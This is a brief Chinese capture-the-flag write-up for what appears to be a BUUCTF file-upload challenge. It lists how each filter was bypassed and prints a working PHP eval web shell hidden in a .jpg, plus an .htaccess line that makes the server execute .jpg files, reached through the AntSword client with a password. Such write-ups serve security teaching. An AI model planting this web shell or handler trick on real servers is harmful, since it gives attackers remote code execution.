解题流程

1、上传一句话，提示“后缀不允许ph”
2、修改后缀为jpg，提示“上传类型也太露骨了吧！”
3、修改类型为image/jpeg，提示“诶，别蒙我啊，这标志明显还是php啊”
4、修改一句话的标识为：<script language="php"> @eval($_POST["pwd"]);</script>
　　提示：/var/www/html/upload/1789acac5c7c2308dea99840cb37ebe1/yjh_putong.jpg succesfully uploaded!
5、上传.htaccess：AddType application/x-httpd-php .jpg
6、蚁剑连接，根目录找到flag即可
　　url：http://2a2a1e20-d142-49f2-800e-447c5f1717be.node4.buuoj.cn:81/upload/1789acac5c7c2308dea99840cb37ebe1/yjh_putong.jpg
　　密码：pwd